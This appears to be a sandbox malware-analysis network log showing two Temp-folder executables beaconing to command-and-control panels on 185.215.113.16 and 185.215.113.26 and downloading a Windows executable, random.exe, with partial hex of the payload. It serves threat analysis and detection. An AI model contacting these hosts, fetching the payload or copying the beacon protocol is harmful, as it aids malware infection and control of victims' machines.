Sep 27, 2024 04:21:59.511580944 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:22:00.189047098 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:22:00.311995983 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 04:22:00.533335924 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	49805	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:22:00.076937914 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:22:00.760850906 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:22:00.828676939 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:22:01.233079910 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	49810	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:22:00.739633083 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:22:01.411295891 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:22:01.455817938 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 04:22:01.678328991 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.5	49812	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:22:01.447321892 CEST	55	OUT	GET /soka/random.exe HTTP/1.1 Host: 185.215.113.16
Sep 27, 2024 04:22:02.175348997 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:02 GMT Content-Type: application/octet-stream Content-Length: 1973760 Last-Modified: Fri, 27 Sep 2024 02:17:51 GMT Connection: keep-alive ETag: "66f615cf-1e1e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 60 4e 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PEL@f`N@N2@WkANAN @.rsrc@.idata @ ,@ukgzfzxu@3@svxbhzsvPN@.taggant0`N"@
Sep 27, 2024 04:22:02.175467014 CEST	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 27, 2024 04:22:02.175498009 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 27, 2024 04:22:02.175532103 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 27, 2024 04:22:02.175565004 CEST	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 27, 2024 04:22:02.175596952 CEST	1236	IN	Data Raw: 09 44 d3 e0 e7 0d 67 80 b3 0c 5b 80 e1 aa 86 1a 60 18 1f 5a ef 0c d0 72 1f 9c a2 51 ca 22 67 61 85 0d 27 4e fb f7 33 30 4b a5 24 17 11 2e 5b b8 cd 5c bb c3 c4 5c 25 1f 77 6c 85 d0 f7 78 1e 41 7e 3c f3 9c 29 f0 1b 2c e8 44 f7 18 3d 1d b3 83 85 1c Data Ascii: Dg[`ZrQ"ga'N30K$.[\\%wlxA~<),D=f$"\|:p1y$W\mNyA<0{W5^^Yp-<(>'\2+!I8<HA$xPp$13P\|0;{[1H5k<LG
Sep 27, 2024 04:22:02.175630093 CEST	1236	IN	Data Raw: 99 3c 44 cc 4a ec cb bc e8 1d 7b a3 c4 fc 28 5d 60 15 c3 d9 8f 3d e7 33 fb 57 32 50 2f 11 04 35 e9 40 c7 5e b5 0d 70 30 79 a4 a4 89 e9 24 b7 5c d8 17 c7 5e 19 0d c4 7a c9 8a c3 40 1d 05 ba 23 11 7c 86 fd 26 3e d0 91 a9 2d 23 d0 d3 3d d0 7e f6 84 Data Ascii: <DJ{(]`=3W2P/5@^p0y$\^z@#\|&>-#=~_ov$W6y0'd$i0Y^pS>> L~7H<9H@5c;$<Yil#T0\|'4bX$$j<AEF 0#,d\D*@-$7U
Sep 27, 2024 04:22:02.175662041 CEST	1236	IN	Data Raw: 45 15 35 8e 89 69 23 d4 bf a5 6a 21 64 61 ab 61 79 63 f0 5e aa 44 23 58 57 1b 0f 30 78 64 47 16 79 0c c8 21 8c 51 cb 19 24 24 b2 68 bb fc 73 14 63 a7 e8 c7 b6 57 f5 1a 06 f8 0c 56 7e e7 40 e4 e1 90 49 32 04 9c 42 62 e7 ec c5 44 db ec db 2e d3 e4 Data Ascii: E5i#j!daayc^D#XW0xdGy!Q$$hscWV~@I2BbD.LTdyt<O@tjpkB0/)0H\pAv[agS`s\ *U@"<ZAxk;z@;IGp+3 =MT9HtH7'
Sep 27, 2024 04:22:02.175694942 CEST	1236	IN	Data Raw: ff e7 fe ac d0 00 e4 3e e8 06 83 5d db f3 35 f8 ea 90 7f c5 50 6d ba 49 cc c8 a0 49 11 5c 6a 43 7d 56 0f 3c 82 0e 33 47 00 c3 49 68 c9 44 27 72 f7 fe 52 9a 1d 61 bb bc 3b be 6a cd ec 1c c9 04 1e 2b 10 9c 41 db 5d 94 fd c4 2b 9a 65 dc be 70 be fc Data Ascii: >]5PmII\jC}V<3GIhD'rRa;j+A]+ep{~/(w* n5 =00S($t>F^b?"Gx-{b`ZgMiW*Y(%LQ6,{~p[?jE`a.14rk}@mI=8
Sep 27, 2024 04:22:02.175728083 CEST	1236	IN	Data Raw: f1 45 6b 62 fe 2c 5b 10 05 c4 ed 88 43 2a f7 50 37 b1 a5 1e aa 7f 5d 1e c8 67 37 90 23 f4 83 b0 b8 93 97 ab a6 7e 95 35 59 78 06 f9 d9 80 bf a5 9b d0 bf d5 c4 a8 85 54 f7 b1 d0 3e 03 6f 3e 48 9d 9b 3c 95 be 7c 7c 61 50 40 74 3d ab 0c c7 9e 88 a9 Data Ascii: Ekb,[CP7]g7#~5YxT>o>H<\|\|aP@t=bp-GJBN:cPQ'_"(a9q3>$QA#h'nM'4ZklP1q5'$\|?uWy3[)JvrBta fYH[x'A
Sep 27, 2024 04:22:02.180674076 CEST	1236	IN	Data Raw: 39 4a 4b 19 31 2f b4 89 fb f2 cf 9c ea 91 7c 13 41 e3 3b a4 2e 6a 63 1c 44 0c 85 50 8d 3e 80 71 df 17 15 40 8e 68 63 bb f0 03 52 e1 0d d4 45 95 f4 00 2c 67 40 e4 85 42 a0 e0 fb 5c 4e f0 d2 ff e8 54 c7 05 a3 30 01 92 7b 40 15 33 e9 40 bf 5a e5 0d Data Ascii: 9JK1/\|A;.jcDP>q@hcRE,g@B\NT0{@3@Z<aH7uf?uI1[mC\.,{g]HQp:)/8w;2?\1)H4y+W%2.@+iSCX-1;KR.(}1Lmni

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	49813	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:22:01.548355103 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:22:02.251425028 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:22:02.259953022 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:22:02.499788046 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	49814	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:22:01.830405951 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:22:02.513273954 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:22:02.514084101 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 04:22:02.738981962 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	49816	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:22:02.639527082 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:22:03.353988886 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:22:03.403779030 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:22:03.647681952 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	49817	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:22:02.956470013 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:22:03.657633066 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:22:03.749703884 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 04:22:03.979695082 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	49819	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:22:03.959166050 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:22:04.647458076 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:22:04.668194056 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:22:04.900230885 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	49820	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:22:04.282638073 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:22:04.957171917 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	49823	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:22:05.119806051 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 04:22:05.806864023 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	49824	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:22:05.120016098 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
